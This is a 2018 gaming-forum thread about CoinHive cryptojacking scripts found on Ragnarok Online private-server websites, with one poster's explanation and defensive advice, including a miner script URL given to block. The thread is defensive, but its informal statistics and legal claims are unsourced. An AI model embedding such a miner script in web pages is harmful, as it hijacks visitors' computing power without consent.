CoinHive Strikes IfritRO

Started by Emcee, Jan 04, 2018, 06:09 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Emcee

Wow another server attacked by a CoinHive!!

www.prnt.sc/hvwxsg

Coinhive is something that takes ram out! The other server responded fast to it and fixed it right away. How will this server deal with it?!

yC

Is that something that is served by the host or because they got the control panel / website template files from the same source?  This is suspicious at the source rather than on individual servers.

DeePee

https://imgur.com/U4Jad9W

This is the one from CapeRO. Same address I think?

Seems like a malicious template seller and server owners who don't bother/aren't capable of checking the website source?

Emcee

Think coinhive starting to attack servers.

CapeRO took action fast. Their website is safe and honestly they are doing good.

IfritRO still not responding.

Parachute

#4
These form of attack is one of the latest security threat worldwide called Cryptojacking.

First of, It gained popularity around last week of September 2017 and one of its first pioneers is the company called CoinHive. Is it Illegal? technically not yet. It is different from making your PC as a zombie or part of a botnet since hackers (usually just script kiddies) are not forcing any malware (like viruses, trojans, worm, etc.) in your system. Though it's unethical to harness one's PC's performance/processing power, battery life/electricity consumption, just for the offender's cryptomining benefit. Your laptop/PC gets hot or make noises (meaning it needed performance boost) whenever you visit an RO website? That probably is a good indication that somebody is using your system to mine cryptocurrency. Sadly, you will never notice this unless you have good browser protection enabled.

Quote from: Emcee on Jan 04, 2018, 01:41 PM
Think coinhive starting to attack servers.

It is not coinhive themselves attacking server websites, but a user of coinhive injects his dedicated script to vulnerable pserver websites.

The more I see RO websites being "attacked" by this, it now makes more sense to me. There are only 2 possibilities.

1. JavaScript Cryptocurrency Mining had been added in the webpage before the site is even live.
2. If the site is already live and SAFE. But then later on this script had been added, it's either the work of the admin or the hacker. Most of the time, admins avoid RMS drama so if they are smart enough to understand that, they wouldn't add this script.

I read a study months ago, that around 80-90% of sites (worldwide) that runs a crypto-mining script has an outdated software(or whatever) in their system that is easily exploited by hackers. Then, a hacker compromises a site and inserts their dedicated CoinHive code. They generate income as simple as visiting the infected site. Based on the Javascript provided from 2 compromised servers, CapeRO and IfritRO, it seems like it has the same CoinHive TAG. Meaning, this code is from the very same user... and he's doing a really good job exploiting ro sites via control panel.

CapeRO: https://imgur.com/U4Jad9W
IfritRO: www.prnt.sc/hvwxsg

@To the server admins:
If more and more pservers had been attacked by Cryptojacking, then that means the control panel (such as FluxCP), generally used by pservers, is now too outdated. Meaning, the best thing you can do is invest a good web protection firewall. If you have a decent earnings via donations, you may want to upgrade your website and avail decent protections (such as Website Application Firewall (WAF), Virtual Patching and Hardening) along with your ddos protection. Find a company that scans your files to check for suspicious scripts.

Most of Cryptojacking only occurs with vulnerable sites, just that, RO Pservers generally do not avail for those kind of protection as it is an "extra" monthly bill.

@To the users:
The good thing is that you can easily stop the miner from running without having to block any websites you visit that might have embedded this code, you just need to block a specific JavaScript URL in your ad blocker (if you are using one in your browser). block is this url:
https://coinhive.com/lib/miner.min.js

Alternatively, you can download browser extensions to defend against this threat such as Norton, No Coin, minerBlock, etc.

Emcee

Quote from: Parachute on Jan 04, 2018, 03:48 PM
These form of attack is one of the latest security threat worldwide called Cryptojacking.

First of, It gained popularity around last week of September 2017 and one of its first pioneers is the company called CoinHive. Is it Illegal? technically not yet. It is different from making your PC as a zombie or part of a botnet since hackers (usually just script kiddies) are not forcing any malware (like viruses, trojans, worm, etc.) in your system. Though it's unethical to harness one's PC's performance/processing power, battery life/electricity consumption, just for the offender's cryptomining benefit. Your laptop/PC gets hot or make noises (meaning it needed performance boost) whenever you visit an RO website? That probably is a good indication that somebody is using your system to mine cryptocurrency. Sadly, you will never notice this unless you have good browser protection enabled.

It is not coinhive themselves attacking server websites, but a user of coinhive injects his dedicated script to vulnerable pserver websites.

The more I see RO websites being "attacked" by this, it now makes more sense to me. There are only 2 possibilities.

1. JavaScript Cryptocurrency Mining had been added in the webpage before the site is even live.
2. If the site is already live and SAFE. But then later on this script had been added, it's either the work of the admin or the hacker. Most of the time, admins avoid RMS drama so if they are smart enough to understand that, they wouldn't add this script.

I read a study months ago, that around 80-90% of sites (worldwide) that runs a crypto-mining script has an outdated software(or whatever) in their system that is easily exploited by hackers. Then, a hacker compromises a site and inserts their dedicated CoinHive code. They generate income as simple as visiting the infected site. Based on the Javascript provided from 2 compromised servers, CapeRO and IfritRO, it seems like it has the same CoinHive TAG. Meaning, this code is from the very same user... and he's doing a really good job exploiting ro sites via control panel.

CapeRO: https://imgur.com/U4Jad9W
IfritRO: www.prnt.sc/hvwxsg

@To the server admins:
If more and more pservers had been attacked by Cryptojacking, then that means the control panel (such as FluxCP), generally used by pservers, is now too outdated. Meaning, the best thing you can do is invest a good web protection firewall. If you have a decent earnings via donations, you may want to upgrade your website and avail decent protections (such as Website Application Firewall (WAF), Virtual Patching and Hardening) along with your ddos protection. Find a company that scans your files to check for suspicious scripts.

Most of Cryptojacking only occurs with vulnerable sites, just that, RO Pservers generally do not avail for those kind of protection as it is an "extra" monthly bill.

@To the users:
The good thing is that you can easily stop the miner from running without having to block any websites you visit that might have embedded this code, you just need to block a specific JavaScript URL in your ad blocker (if you are using one in your browser). block is this url:
https://coinhive.com/lib/miner.min.js

Alternatively, you can download browser extensions to defend against this threat such as Norton, No Coin, minerBlock, etc.

Its the host bra

Emcee

Take some fking action my pc is slowing down everytime i enter this site

yC

One day after you posted I looked at the website and can't find the code in your screenshot, are you sure they didn't take care of it yet or it's not at the main page?


Emcee

Quote from: yC on Jan 08, 2018, 12:53 PM
One day after you posted I looked at the website and can't find the code in your screenshot, are you sure they didn't take care of it yet or it's not at the main page?



I will report the link soon as i get home